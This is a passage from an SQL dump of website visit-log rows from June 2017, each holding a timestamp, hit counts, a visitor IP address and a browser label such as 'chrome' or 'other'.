1497749168,1,1,0,0,'51.255.65.97','other'),(122837,1497749384,1,1,0,0,'217.69.133.9','other'),(122838,1497749921,2,2,0,0,'5.9.156.43','other'),(122839,1497750019,1,1,0,0,'164.132.161.79','other'),(122840,1497750315,2,2,0,0,'54.165.59.7','other'),(122841,1497750367,1,1,0,0,'51.255.71.98','other'),(122842,1497750650,1,1,0,0,'164.132.161.41','other'),(122843,1497751182,1,1,0,0,'157.55.39.54','other'),(122844,1497751287,1,1,0,0,'217.182.132.53','other'),(122845,1497751310,1,1,0,0,'217.182.132.31','other'),(122846,1497751469,1,1,0,0,'51.255.65.47','other'),(122847,1497751510,1,1,0,0,'217.182.132.62','other'),(122848,1497751678,7,7,0,0,'107.150.59.98','other'),(122849,1497751908,1,1,0,0,'51.255.65.7','other'),(122850,1497752860,1,0,1,0,'66.249.76.89',''),(122851,1497753228,1,1,0,0,'51.255.65.42','other'),(122852,1497753565,1,1,0,0,'137.74.207.110','other'),(122853,1497753712,1,1,0,0,'66.249.76.91','chrome'),(122854,1497753753,1,1,0,0,'66.249.66.155','chrome'),(122855,1497754069,1,1,0,0,'51.255.65.7','other'),(122856,1497754449,1,1,0,0,'164.132.161.67','other'),(122857,1497754490,1,0,1,0,'66.249.76.108',''),(122858,1497754631,1,1,0,0,'51.255.65.81','other'),(122859,1497754789,1,1,0,0,'51.255.65.90','other'),(122860,1497754809,1,0,1,0,'66.249.76.93',''),(122861,1497754902,1,1,0,0,'217.182.132.67','other'),(122862,1497754948,1,1,0,0,'8.29.198.27','other'),(122863,1497755636,1,1,0,0,'51.255.65.53','other'),(122864,1497755816,1,1,0,0,'217.182.132.149','other'),(122865,1497755942,1,1,0,0,'164.132.162.187','other'),(122866,1497756174,1,0,1,0,'66.249.76.109',''),(122867,1497756251,1,0,1,0,'66.249.76.91',''),(122868,1497756313,1,1,0,0,'51.255.65.87','other'),(122869,1497756556,1,1,0,0,'51.255.65.49','other'),(122870,1497756699,1,0,1,0,'66.249.76.93',''),(122871,1497756755,1,1,0,0,'51.255.71.112','other'),(122872,1497757072,1,1,0,0,'217.69.133.3','other'),(122873,1497757607,1,1,0,0,'217.182.132.170','other'),(122874,1497757675,1,1,0,0,'40.77.167.44','other'),(122875,1497757717,1,1,0,0,'51.255.65.57','other'),(122876,1497758017,1,0,1,0,'66.249.76.108',''),(122877,1497758072,1,0,1,0,'66.249.66.156',''),(122878,1497758212,1,1,0,0,'217.182.132.68','other'),(122879,1497758853,1,1,0,0,'217.182.132.53','other'),(122880,1497759520,1,1,0,0,'51.255.65.47','other'),(122881,1497759546,1,1,0,0,'164.132.161.49','other'),(122882,1497759964,1,0,1,0,'66.249.76.89',''),(122883,1497760192,1,1,0,0,'51.255.65.56','other'),(122884,1497760278,1,0,1,0,'66.249.76.107',''),(122885,1497760360,1,1,0,0,'176.193.165.14','msie'),(122886,1497760544,1,1,0,0,'66.102.9.27','chrome'),(122887,1497761133,1,1,0,0,'51.255.65.8','other'),(122888,1497761200,2,2,0,0,'92.113.189.18','chrome'),(122889,1497761207,1,1,0,0,'164.132.161.41','other'),(122890,1497761919,1,1,0,0,'51.255.65.14','other'),(122891,1497761960,1,1,0,0,'208.43.225.84','other'),(122892,1497761985,1,1,0,0,'51.255.65.56','other'),(122893,1497762169,1,1,0,0,'137.74.201.108','other'),(122894,1497762174,1,0,1,0,'66.249.76.93',''),(122895,1497762401,1,1,0,0,'51.255.65.93','other'),(122896,1497762847,1,1,0,0,'164.132.161.94','other'),(122897,1497762991,1,1,0,0,'207.46.13.177','other'),(122898,1497763005,1,0,1,0,'66.249.66.155',''),(122899,1497763084,1,1,0,0,'66.249.76.107','chrome'),(122900,1497763232,1,1,0,0,'217.182.132.193','other'),(122901,1497763848,1,1,0,0,'164.132.161.27','other'),(122902,1497763853,1,1,0,0,'51.255.65.2','other'),(122903,1497763887,1,1,0,0,'217.182.132.62','other'),(122904,1497763938,1,1,0,0,'51.255.65.63','other'),(122905,1497763964,1,1,0,0,'178.95.156.151','chrome'),(122906,1497764229,1,1,0,0,'151.80.27.116','other'),(122907,1497764518,1,1,0,0,'164.132.161.40','other'),(122908,1497764605,1,1,0,0,'217.182.132.55','other'),(122909,1497764894,1,1,0,0,'51.255.65.61','other'),(122910,1497765445,1,1,0,0,'51.255.65.3','other'),(122911,1497765487,1,1,0,0,'51.255.71.118','other'),(122912,1497765774,1,1,0,0,'8.29.198.27','other'),(122913,1497766086,1,1,0,0,'217.182.132.175','other'),(122914,1497766178,1,0,1,0,'66.249.76.107',''),(122915,1497767262,1,1,0,0,'217.182.132.56','other'),(122916,1497767333,1,1,0,0,'217.182.132.67','other'),(122917,1497767334,1,0,1,0,'66.249.76.93',''),(122918,1497768088,1,1,0,0,'217.69.133.4','other'),(122919,1497768210,1,0,1,0,'66.249.66.157',''),(122920,1497768277,1,1,0,0,'217.182.132.50','other'),(122921,1497768415,1,0,1,0,'66.249.76.93',''),(122922,1497768566,1,1,0,0,'66.249.76.109','chrome'),(122923,1497768568,1,1,0,0,'66.249.76.108','chrome'),(122924,1497768794,1,1,0,0,'54.165.59.7','other'),(122925,1497768810,1,1,0,0,'217.182.132.155','other'),(122926,1497769036,1,0,1,0,'66.249.76.91',''),(122927,1497769995,1,0,1,0,'66.249.66.76',''),(122928,1497771174,1,1,0,0,'164.132.161.17','other'),(122929,1497771227,1,1,0,0,'66.249.66.76','chrome'),(122930,1497771533,1,1,0,0,'217.182.132.31','other'),(122931,1497772125,1,0,1,0,'66.249.66.74',''),(122932,1497772191,1,1,0,0,'164.132.161.6','other'),(122933,1497772811,1,1,0,0,'137.74.207.159','other'),(122934,1497772920,1,1,0,0,'217.182.132.55','other'),(122935,1497772975,1,1,0,0,'51.255.65.52','other'),(122936,1497773141,1,1,0,0,'51.255.65.74','other'),(122937,1497773716,1,1,0,0,'66.249.66.156','chrome'),(122938,1497773919,1,1,0,0,'217.182.132.79','other'),(122939,1497773989,1,1,0,0,'66.249.66.155','chrome'),(122940,1497773993,1,1,0,0,'66.249.76.108','chrome'),(122941,1497774166,1,1,0,0,'157.55.39.54','other'),(122942,1497774225,1,1,0,0,'51.255.65.89','other'),(122943,1497774269,1,1,0,0,'207.46.13.177','other'),(122944,1497774283,1,1,0,0,'217.182.132.15','other'),(122945,1497774702,1,1,0,0,'95.108.213.25','other'),(122946,1497774703,1,1,0,0,'5.255.253.54','other'),(122947,1497774738,1,0,1,0,'66.249.66.76',''),(122948,1497774751,1,1,0,0,'51.255.71.131','other'),(122949,1497774845,1,1,0,0,'216.244.66.237','other'),(122950,1497774927,1,1,0,0,'51.255.65.66','other'),(122951,1497775506,4,4,0,0,'86.107.110.219','other'),(122952,1497775936,1,1,0,0,'51.255.65.54','other'),(122953,1497776063,1,1,0,0,'217.182.132.74','other'),(122954,1497776134,1,1,0,0,'164.132.161.79','other'),(122955,1497776218,1,0,1,0,'66.249.76.93',''),(122956,1497776606,1,0,1,0,'66.249.76.109',''),(122957,1497776620,1,1,0,0,'8.29.198.26','other'),(122958,1497776768,1,1,0,0,'217.182.132.61','other'),(122959,1497777233,1,1,0,0,'51.255.71.121','other'),(122960,1497777972,1,1,0,0,'217.182.132.92','other'),(122961,1497778006,1,1,0,0,'164.132.161.29','other'),(122962,1497778220,1,1,0,0,'51.255.65.21','other'),(122963,1497778260,1,1,0,0,'51.255.65.6','other'),(122964,1497778388,1,1,0,0,'157.55.39.54','other'),(122965,1497778487,1,1,0,0,'217.182.132.147','other'),(122966,1497778762,1,1,0,0,'217.182.132.74','other'),(122967,1497778779,2,1,1,0,'66.249.76.93',''),(122968,1497779020,1,1,0,0,'207.46.13.82','other'),(122969,1497779141,1,1,0,0,'164.132.161.71','other'),(122970,1497779243,1,1,0,0,'51.255.65.96','other'),(122971,1497779560,1,1,0,0,'66.249.76.93','chrome'),(122972,1497780022,1,1,0,0,'217.182.132.55','other'),(122973,1497780243,1,1,0,0,'164.132.161.16','other'),(122974,1497780557,1,0,1,0,'66.249.66.155',''),(122975,1497780598,1,1,0,0,'51.255.65.92','other'),(122976,1497780605,1,1,0,0,'217.182.132.51','other'),(122977,1497780673,1,1,0,0,'51.255.65.51','other'),(122978,1497781116,1,1,0,0,'217.182.132.178','other'),(122979,1497781119,1,1,0,0,'51.255.65.81','other'),(122980,1497781151,1,1,0,0,'51.255.65.70','other'),(122981,1497781752,1,1,0,0,'157.55.39.120','other'),(122982,1497781853,1,1,0,0,'54.165.59.7','other'),(122983,1497782071,1,1,0,0,'216.244.66.237','other'),(122984,1497782284,1,1,0,0,'157.55.39.54','other'),(122985,1497782379,1,0,1,0,'66.249.76.112',''),(122986,1497782596,1,1,0,0,'164.132.161.40','other'),(122987,1497782669,1,0,1,0,'66.249.76.137',''),(122988,1497782796,1,1,0,0,'217.182.132.20','other'),(122989,1497783032,2,1,1,0,'66.249.66.76',''),(122990,1497783618,1,1,0,0,'217.182.132.82','other'),(122991,1497784455,1,1,0,0,'51.255.65.64','other'),(122992,1497784516,1,1,0,0,'92.112.41.193','chrome'),(122993,1497784761,1,0,1,0,'66.249.76.113',''),(122994,1497784931,1,0,1,0,'68.180.230.48',''),(122995,1497784936,1,1,0,0,'164.132.161.6','other'),(122996,1497785288,1,1,0,0,'51.255.71.119','other'),(122997,1497785661,1,1,0,0,'217.182.132.188','other'),(122998,1497785724,1,1,0,0,'66.249.66.157','chrome'),(122999,1497785926,12,12,0,0,'5.9.144.195','other'),(123000,1497786009,1,1,0,0,'51.255.71.128','other'),(123001,1497786333,1,0,1,0,'66.249.76.114',''),(123002,1497787459,1,1,0,0,'8.29.198.27','other'),(123003,1497787992,1,1,0,0,'66.249.66.75','chrome'),(123004,1497788022,1,1,0,0,'138.68.92.98','chrome'),(123005,1497788609,1,1,0,0,'216.244.66.237','other'),(123006,1497788719,1,1,0,0,'66.249.76.113','chrome'),(123007,1497788982,1,1,0,0,'51.255.71.117','other'),(123008,1497789455,1,1,0,0,'217.182.132.92','other'),(123009,1497791246,1,1,0,0,'51.255.65.33','other'),(123010,1497791253,1,1,0,0,'222.254.238.219','firefox'),(123011,1497791361,1,0,1,0,'66.249.76.137',''),(123012,1497791669,1,1,0,0,'217.182.132.72','other'),(123013,1497791714,1,1,0,0,'51.255.65.66','other'),(123014,1497791780,1,1,0,0,'217.182.132.27','other'),(123015,1497791830,1,1,0,0,'51.255.65.67','other'),(123016,1497792218,1,1,0,0,'164.132.162.157','other'),(123017,1497792701,1,1,0,0,'217.182.132.31','other'),(123018,1497792940,1,1,0,0,'164.132.161.74','other'),(123019,1497794472,1,0,1,0,'66.249.76.114',''),(123020,1497794596,1,0,1,0,'66.249.76.137',''),(123021,1497794836,1,1,0,0,'66.249.76.113','chrome'),(123022,1497794863,1,0,1,0,'66.249.66.156',''),(123023,1497795086,1,1,0,0,'164.132.162.159','other'),(123024,1497795627,1,1,0,0,'51.255.71.121','other'),(123025,1497796582,1,1,0,0,'164.132.161.34','other'),(123026,1497796714,1,1,0,0,'157.55.39.120','other'),(123027,1497796926,1,1,0,0,'217.182.132.177','other'),(123028,1497797478,1,1,0,0,'164.132.161.42','other'),(123029,1497797915,1,1,0,0,'91.196.178.165','chrome'),(123030,1497798090,1,0,1,0,'66.249.66.74',''),(123031,1497798286,1,1,0,0,'8.29.198.25','other'),(123032,1497799167,1,1,0,0,'93.75.2.233','firefox'),(123033,1497799472,1,1,0,0,'164.132.161.41','other'),(123034,1497800265,1,1,0,0,'66.249.66.76','chrome'),(123035,1497800318,1,1,0,0,'66.249.66.157','chrome'),(123036,1497801470,1,1,0,0,'164.132.161.94','other'),(123037,1497801796,1,1,0,0,'51.255.65.77','other'),(123038,1497802152,1,0,1,0,'66.249.66.76',''),(123039,1497802305,1,1,0,0,'51.255.65.21','other'),(123040,1497803378,1,1,0,0,'164.132.161.13','other'),(123041,1497803660,1,1,0,0,'164.132.161.30','other'),(123042,1497804554,1,1,0,0,'217.182.132.151','other'),(123043,1497804836,1,1,0,0,'164.132.161.57','other'),(123044,1497806069,1,1,0,0,'141.0.12.179','other'),(123045,1497806070,1,1,0,0,'185.26.180.221','other'),(123046,1497806790,1,0,1,0,'66.249.76.114',''),(123047,1497806939,1,0,1,0,'66.249.76.112',''),(123048,1497807006,1,1,0,0,'217.182.132.185','other'),(123049,1497807028,1,1,0,0,'178.154.200.27','other'),(123050,1497807129,1,1,0,0,'93.158.152.43','other'),(123051,1497807200,1,1,0,0,'217.182.132.148','other'),(123052,1497807675,1,1,0,0,'207.46.13.177','other'),(123053,1497808228,1,1,0,0,'217.69.133.203','other'),(123054,1497809057,1,1,0,0,'62.80.185.138','chrome'),(123055,1497809110,1,1,0,0,'8.29.198.26','other'),(123056,1497809686,1,1,0,0,'164.132.161.16','other'),(123057,1497810139,2,0,2,0,'66.249.76.112',''),(123058,1497810548,1,1,0,0,'66.249.76.113','chrome'),(123059,1497810644,1,1,0,0,'164.132.161.44','other'),(123060,1497811149,1,1,0,0,'46.211.66.236','chrome'),(123061,1497811506,1,1,0,0,'137.74.207.188','other'),(123062,1497811670,1,1,0,0,'164.132.161.87','other'),(123063,1497811686,1,0,1,0,'66.249.76.114',''),(123064,1497811895,1,0,1,0,'66.249.76.112',''),(123065,1497811934,1,1,0,0,'66.249.66.155','chrome'),(123066,1497812166,1,1,0,0,'217.69.133.2','other'),(123067,1497812430,1,1,0,0,'164.132.161.58','other'),(123068,1497812562,1,1,0,0,'217.182.132.29','other'),(123069,1497812769,1,1,0,0,'37.53.110.62','firefox'),(123070,1497812965,1,1,0,0,'207.46.13.177','other'),(123071,1497813022,1,1,0,0,'51.255.65.58','other'),(123072,1497813682,1,1,0,0,'37.53.110.62','firefox'),(123073,1497813766,1,1,0,0,'217.69.133.9','other'),(123074,1497814547,1,1,0,0,'164.132.161.60','other'),(123075,1497814583,1,1,0,0,'37.53.110.62','firefox'),(123076,1497814687,1,0,1,0,'66.249.76.114',''),(123077,1497814782,1,0,1,0,'66.249.76.113',''),(123078,1497814810,1,1,0,0,'46.211.66.236','chrome'),(123079,1497815227,1,0,1,0,'66.249.76.131',''),(123080,1497816226,2,2,0,0,'207.46.13.177','other'),(123081,1497816334,1,1,0,0,'95.134.220.56','chrome'),(123082,1497817061,1,1,0,0,'66.249.66.76','chrome'),(123083,1497817343,1,1,0,0,'66.249.76.113','chrome'),(123084,1497817669,1,1,0,0,'51.255.71.101','other'),(123085,1497817878,1,1,0,0,'176.8.141.224','chrome'),(123086,1497818027,1,1,0,0,'207.46.13.177','other'),(123087,1497818115,1,0,1,0,'66.249.76.114',''),(123088,1497819445,1,1,0,0,'164.132.161.12','other'),(123089,1497819688,1,1,0,0,'37.54.23.13','chrome'),(123090,1497819824,1,1,0,0,'40.77.167.42','other'),(123091,1497819850,1,1,0,0,'176.214.126.210','firefox'),(123092,1497819948,1,1,0,0,'8.29.198.26','other'),(123093,1497820842,1,0,1,0,'66.249.66.74',''),(123094,1497821104,1,1,0,0,'193.107.73.7','chrome'),(123095,1497821348,1,1,0,0,'51.255.71.116','other'),(123096,1497821607,1,1,0,0,'51.255.65.85','other'),(123097,1497821625,1,1,0,0,'66.249.76.112','chrome'),(123098,1497821795,1,1,0,0,'51.255.65.14','other'),(123099,1497821908,1,1,0,0,'51.255.65.52','other'),(123100,1497822117,1,1,0,0,'217.182.132.241','other'),(123101,1497822303,1,0,1,0,'66.249.66.74',''),(123102,1497822719,1,1,0,0,'216.244.66.237','other'),(123103,1497822741,1,1,0,0,'217.182.132.147','other'),(123104,1497823206,1,1,0,0,'217.69.133.3','other'),(123105,1497823211,1,0,1,0,'66.249.66.157',''),(123106,1497823373,1,1,0,0,'66.249.76.112','chrome'),(123107,1497823415,1,1,0,0,'217.182.132.154','other'),(123108,1497824652,1,1,0,0,'157.55.39.27','other'),(123109,1497824834,1,0,1,0,'66.249.66.75',''),(123110,1497826407,1,1,0,0,'217.182.132.174','other'),(123111,1497827120,1,1,0,0,'51.255.71.126','other'),(123112,1497827480,1,1,0,0,'51.255.65.73','other'),(123113,1497827580,1,1,0,0,'157.55.39.27','other'),(123114,1497827853,1,1,0,0,'217.182.132.62','other'),(123115,1497828130,1,1,0,0,'51.255.65.44','other'),(123116,1497828177,1,1,0,0,'51.255.65.27','other'),(123117,1497828229,1,1,0,0,'51.255.71.114','other'),(123118,1497828484,1,1,0,0,'164.132.161.95','other'),(123119,1497829874,1,1,0,0,'217.182.132.87','other'),(123120,1497830782,1,1,0,0,'8.29.198.26','other'),(123121,1497831019,1,1,0,0,'217.182.132.27','other'),(123122,1497831129,2,2,0,0,'95.213.141.126','opera'),(123123,1497831312,1,1,0,0,'66.249.76.114','chrome'),(123124,1497831392,1,1,0,0,'176.214.126.210','chrome'),(123125,1497831553,1,0,1,0,'66.249.76.113',''),(123126,1497831684,2,2,0,0,'178.154.200.42','other'),(123127,1497831810,1,1,0,0,'51.255.65.20','other'),(123128,1497832109,1,1,0,0,'66.249.66.155','chrome'),(123129,1497832202,8,8,0,0,'107.150.59.98','other'),(123130,1497833988,1,0,1,0,'66.249.76.131',''),(123131,1497834427,1,1,0,0,'66.249.76.137','chrome'),(123132,1497834512,1,1,0,0,'66.249.66.156','chrome'),(123133,1497835275,1,1,0,0,'40.77.167.109','other'),(123134,1497835546,1,1,0,0,'164.132.161.26','other'),(123135,1497836277,1,1,0,0,'164.132.161.41','other'),(123136,1497836335,1,1,0,0,'180.76.15.18','other'),(123137,1497836611,1,1,0,0,'180.76.15.19','other'),(123138,1497836617,1,1,0,0,'217.182.132.30','other'),(123139,1497837796,1,1,0,0,'66.249.76.113','chrome'),(123140,1497837893,1,1,0,0,'164.132.161.33','other'),(123141,1497838132,1,1,0,0,'66.249.66.156','chrome'),(123142,1497838324,1,1,0,0,'217.182.132.77','other'),(123143,1497839186,1,1,0,0,'51.255.65.13','other'),(123144,1497839563,1,1,0,0,'51.255.65.56','other'),(123145,1497840186,1,1,0,0,'5.196.87.171','other'),(123146,1497840210,1,1,0,0,'46.48.13.161','chrome'),(123147,1497840444,1,1,0,0,'5.255.253.54','other'),(123148,1497841619,1,1,0,0,'8.29.198.26','other'),(123149,1497841640,1,0,1,0,'68.180.230.48',''),(123150,1497841670,1,1,0,0,'51.255.71.132','other'),(123151,1497842405,1,1,0,0,'51.255.65.8','other'),(123152,1497842589,1,1,0,0,'164.132.161.50','other'),(123153,1497842617,1,1,0,0,'51.255.65.47','other'),(123154,1497843553,1,0,1,0,'66.249.76.114',''),(123155,1497843993,1,0,1,0,'66.249.76.137',''),(123156,1497844279,1,1,0,0,'217.182.132.64','other'),(123157,1497844487,1,1,0,0,'51.255.65.8','other'),(123158,1497844488,1,1,0,0,'164.132.161.41','other'),(123159,1497845314,1,1,0,0,'164.132.161.43','other'),(123160,1497845342,1,1,0,0,'51.255.65.48','other'),(123161,1497845414,1,1,0,0,'51.255.65.2','other'),(123162,1497845509,1,1,0,0,'51.255.71.129','other'),(123163,1497845663,1,1,0,0,'46.48.13.161','chrome'),(123164,1497847012,1,1,0,0,'91.196.178.68','firefox'),(123165,1497847049,1,1,0,0,'217.182.132.186','other'),(123166,1497847500,1,1,0,0,'5.196.87.172','other'),(123167,1497847666,1,1,0,0,'51.255.65.24','other'),(123168,1497847987,1,1,0,0,'157.55.39.27','other'),(123169,1497848521,1,1,0,0,'91.196.178.68','firefox'),(123170,1497848615,1,1,0,0,'51.255.65.56','other'),(123171,1497849007,1,1,0,0,'51.255.65.26','other'),(123172,1497849375,1,1,0,0,'217.182.132.152','other'),(123173,1497849671,1,1,0,0,'91.196.178.70','firefox'),(123174,1497849932,1,1,0,0,'51.255.71.98','other'),(123175,1497850557,1,1,0,0,'217.182.132.27','other'),(123176,1497850659,1,1,0,0,'93.183.193.169','chrome'),(123177,1497850743,1,1,0,0,'128.68.136.179','msie'),(123178,1497850748,1,1,0,0,'91.196.177.46','chrome'),(123179,1497850759,1,1,0,0,'66.102.9.153','chrome'),(123180,1497850817,1,1,0,0,'217.182.132.71','other'),(123181,1497851134,1,1,0,0,'51.255.65.96','other'),(123182,1497851460,1,0,1,0,'66.249.66.156',''),(123183,1497851652,2,2,0,0,'37.54.199.201','chrome'),(123184,1497852149,1,1,0,0,'46.161.9.52','chrome'),(123185,1497852159,1,1,0,0,'157.55.39.27','other'),(123186,1497852335,1,1,0,0,'95.132.101.252','opera'),(123187,1497852452,1,1,0,0,'8.29.198.26','other'),(123188,1497852923,1,1,0,0,'51.255.65.62','other'),(123189,1497853396,1,1,0,0,'91.196.178.68','firefox'),(123190,1497854004,1,0,1,0,'66.249.66.75',''),(123191,1497854112,1,1,0,0,'217.182.132.94','other'),(123192,1497854122,1,1,0,0,'176.14.222.109','msie'),(123193,1497854367,1,1,0,0,'91.196.178.68','firefox'),(123194,1497854522,1,0,1,0,'66.249.76.137',''),(123195,1497855076,5,5,0,0,'213.136.73.195','other'),(123196,1497855451,1,1,0,0,'217.182.132.72','other'),(123197,1497855665,1,1,0,0,'107.21.1.8','other'),(123198,1497856040,1,1,0,0,'66.249.66.75','chrome'),(123199,1497856135,1,0,1,0,'66.249.66.156',''),(123200,1497856328,1,1,0,0,'217.69.133.6','other'),(123201,1497856438,1,1,0,0,'51.255.65.54','other'),(123202,1497856681,1,1,0,0,'178.95.247.243','firefox'),(123203,1497856780,1,1,0,0,'91.196.178.37','chrome'),(123204,1497856917,1,1,0,0,'137.74.207.159','other'),(123205,1497857315,1,1,0,0,'91.196.177.15','chrome'),(123206,1497857477,1,1,0,0,'51.255.65.9','other'),(123207,1497857774,1,1,0,0,'178.95.247.243','firefox'),(123208,1497857786,1,1,0,0,'217.182.132.53','other'),(123209,1497857838,1,1,0,0,'51.255.71.113','other'),(123210,1497858348,1,1,0,0,'91.196.177.46','firefox'),(123211,1497858351,1,1,0,0,'217.182.132.75','other'),(123212,1497858414,1,1,0,0,'207.46.13.143','other'),(123213,1497858751,1,1,0,0,'91.196.178.68','chrome'),(123214,1497858808,1,0,1,0,'66.249.66.74',''),(123215,1497858846,1,1,0,0,'91.196.177.26','chrome'),(123216,1497859054,1,1,0,0,'51.255.65.23','other'),(123217,1497859464,2,2,0,0,'91.196.178.134','chrome'),(123218,1497859621,1,1,0,0,'51.255.65.78','other'),(123219,1497860267,1,1,0,0,'51.255.71.123','other'),(123220,1497860751,1,1,0,0,'66.249.66.74','chrome'),(123221,1497860783,1,1,0,0,'91.196.178.68','chrome'),(123222,1497860878,1,1,0,0,'173.252.88.86','other'),(123223,1497860880,1,1,0,0,'69.171.228.121','other'),(123224,1497860890,1,1,0,0,'91.196.178.134','chrome'),(123225,1497860972,1,1,0,0,'66.249.66.156','chrome'),(123226,1497861817,1,1,0,0,'217.69.133.6','other'),(123227,1497862124,1,1,0,0,'91.196.178.162','chrome'),(123228,1497862137,1,1,0,0,'194.44.244.130','chrome'),(123229,1497862429,1,1,0,0,'51.255.65.75','other'),(123230,1497862547,1,1,0,0,'82.145.222.52','chrome'),(123231,1497863282,1,1,0,0,'8.29.198.27','other'),(123232,1497863340,1,1,0,0,'91.196.178.162','chrome'),(123233,1497863810,1,1,0,0,'5.196.87.173','other'),(123234,1497864035,1,1,0,0,'91.196.178.130','firefox'),(123235,1497864067,1,1,0,0,'217.182.132.151','other'),(123236,1497864182,2,2,0,0,'208.43.225.85','other'),(123237,1497864255,1,1,0,0,'178.95.247.243','firefox'),(123238,1497864435,1,1,0,0,'217.182.132.20','other'),(123239,1497865111,2,2,0,0,'91.196.178.71','chrome'),(123240,1497865258,1,1,0,0,'37.54.20.185','chrome'),(123241,1497865523,1,1,0,0,'178.95.247.243','firefox'),(123242,1497865615,1,1,0,0,'94.178.105.247','firefox'),(123243,1497865752,1,1,0,0,'5.39.49.212','firefox'),(123244,1497865925,1,1,0,0,'157.55.39.27','other'),(123245,1497866224,1,0,1,0,'66.249.66.76',''),(123246,1497866403,1,1,0,0,'216.244.66.237','other'),(123247,1497866876,1,1,0,0,'217.182.132.155','other'),(123248,1497866946,1,0,1,0,'66.249.76.113',''),(123249,1497867132,1,1,0,0,'180.76.15.33','other'),(123250,1497867207,1,1,0,0,'164.132.161.63','other'),(123251,1497867906,1,1,0,0,'54.165.59.7','other'),(123252,1497867935,1,1,0,0,'137.74.207.110','other'),(123253,1497868254,1,1,0,0,'91.196.178.69','chrome'),(123254,1497868712,1,1,0,0,'194.37.248.11','chrome'),(123255,1497870088,1,1,0,0,'91.196.178.164','chrome'),(123256,1497870108,1,1,0,0,'91.196.177.26','chrome'),(123257,1497870680,1,1,0,0,'213.231.3.145','chrome'),(123258,1497871151,1,1,0,0,'92.112.109.230','chrome'),(123259,1497871196,1,1,0,0,'91.196.178.71','chrome'),(123260,1497871210,1,1,0,0,'193.93.184.171','chrome'),(123261,1497871416,1,1,0,0,'164.132.161.85','other'),(123262,1497871493,1,1,0,0,'91.196.178.70','chrome'),(123263,1497871544,2,2,0,0,'178.154.200.42','other'),(123264,1497871632,1,1,0,0,'141.8.132.47','other'),(123265,1497871688,1,1,0,0,'37.9.113.11','other'),(123266,1497871856,2,2,0,0,'5.255.253.23','other'),(123267,1497872077,1,1,0,0,'217.182.132.177','other'),(123268,1497872279,2,2,0,0,'5.255.253.54','other'),(123269,1497872497,1,1,0,0,'180.76.15.136','other'),(123270,1497872500,1,1,0,0,'40.77.167.109','other'),(123271,1497872761,1,1,0,0,'91.196.178.68','firefox'),(123272,1497872767,1,1,0,0,'103.253.146.245','chrome'),(123273,1497873134,1,1,0,0,'91.209.11.236','other'),(123274,1497873222,1,1,0,0,'5.255.253.27','other'),(123275,1497873729,4,4,0,0,'5.255.253.54','other'),(123276,1497873946,2,0,2,0,'68.180.230.48',''),(123277,1497874121,1,1,0,0,'8.29.198.25','other'),(123278,1497874404,1,1,0,0,'91.196.178.68','firefox'),(123279,1497874576,1,1,0,0,'91.206.4.194','chrome'),(123280,1497874687,1,1,0,0,'176.15.236.70','chrome'),(123281,1497874814,1,1,0,0,'95.108.179.14','other'),(123282,1497875249,1,1,0,0,'141.8.142.152','other'),(123283,1497875626,1,1,0,0,'178.95.247.243','firefox'),(123285,1497875966,1,1,0,0,'178.154.200.27','other'),(123286,1497876108,3,3,0,0,'178.154.200.42','other'),(123287,1497876125,2,2,0,0,'91.196.178.68','chrome'),(123288,1497876217,4,4,0,0,'141.8.142.134','other'),(123289,1497876423,7,7,0,0,'141.8.132.47','other'),(123290,1497876428,1,0,1,0,'66.249.76.131',''),(123291,1497876585,6,6,0,0,'141.8.142.152','other'),(123292,1497876604,1,1,0,0,'178.95.247.243','firefox'),(123293,1497876990,1,0,1,0,'68.180.230.48',''),(123294,1497877023,1,1,0,0,'91.209.11.236','other'),(123295,1497877054,1,1,0,0,'141.8.132.49','other'),(123296,1497877067,1,1,0,0,'95.135.18.15','chrome'),(123297,1497877153,1,1,0,0,'141.8.142.134','other'),(123298,1497877180,2,2,0,0,'178.154.200.42','other'),(123299,1497877303,1,1,0,0,'207.154.234.71','other'),(123300,1497877376,2,2,0,0,'5.255.253.54','other'),(123301,1497878166,1,1,0,0,'66.249.76.131','chrome'),(123302,1497878329,1,1,0,0,'91.209.11.236','other'),(123303,1497878673,1,1,0,0,'91.196.177.26','chrome'),(123304,1497879282,1,1,0,0,'178.95.247.243','firefox'),(123305,1497880085,1,1,0,0,'66.249.76.93','chrome'),(123306,1497880146,1,1,0,0,'46.133.19.216','chrome'),(123307,1497880671,1,1,0,0,'178.154.200.42','other'),(123308,1497880774,1,1,0,0,'216.244.66.237','other'),(123309,1497880974,1,1,0,0,'178.95.247.243','firefox'),(123310,1497881283,1,0,1,0,'66.249.76.137',''),(123311,1497881592,1,1,0,0,'91.196.178.166','chrome'),(123312,1497882072,1,0,1,0,'66.249.66.157',''),(123313,1497882444,1,1,0,0,'66.249.66.74','chrome'),(123314,1497882465,2,1,1,0,'66.249.66.155',''),(123315,1497883467,1,0,1,0,'66.249.66.155',''),(123316,1497883938,4,4,0,0,'91.209.11.236','other'),(123317,1497884424,1,1,0,0,'91.196.177.15','chrome'),(123318,1497885241,1,1,0,0,'5.255.253.54','other'),(123319,1497885267,1,1,0,0,'95.108.213.25','other'),(123320,1497885408,1,1,0,0,'65.19.138.34','other'),(123321,1497886063,2,2,0,0,'178.154.200.42','other'),(123322,1497886106,1,1,0,0,'37.9.113.11','other'),(123323,1497886162,1,1,0,0,'5.255.253.54','other'),(123324,1497886194,1,1,0,0,'5.255.253.45','other'),(123325,1497886200,1,1,0,0,'5.255.253.34','other'),(123326,1497886310,4,4,0,0,'91.209.11.236','other'),(123327,1497886944,1,1,0,0,'54.80.219.137','other'),(123328,1497887008,1,1,0,0,'37.9.113.11','other'),(123329,1497887292,1,1,0,0,'95.108.213.25','other'),(123330,1497887516,3,3,0,0,'141.8.142.152','other'),(123331,1497887585,2,2,0,0,'178.154.200.42','other'),(123332,1497887877,3,3,0,0,'91.209.11.236','other'),(123333,1497887948,1,1,0,0,'40.77.167.109','other'),(123334,1497887962,2,2,0,0,'5.255.253.45','other'),(123335,1497887977,1,1,0,0,'178.154.200.27','other'),(123336,1497888115,1,1,0,0,'5.255.253.54','other'),(123337,1497888147,2,2,0,0,'141.8.142.134','other'),(123338,1497888300,1,1,0,0,'5.255.253.66','other'),(123339,1497888696,1,1,0,0,'46.211.129.177','chrome'),(123340,1497888944,1,1,0,0,'141.8.132.49','other'),(123341,1497889252,1,1,0,0,'79.164.122.96','msie'),(123342,1497889260,1,1,0,0,'37.73.195.114','chrome'),(123343,1497889327,1,1,0,0,'91.196.178.65','firefox'),(123344,1497890158,1,1,0,0,'91.196.178.70','other'),(123345,1497890639,1,0,1,0,'66.249.66.157',''),(123346,1497891060,1,0,1,0,'66.249.66.156',''),(123347,1497891529,1,1,0,0,'91.209.11.236','other'),(123348,1497892559,1,1,0,0,'180.7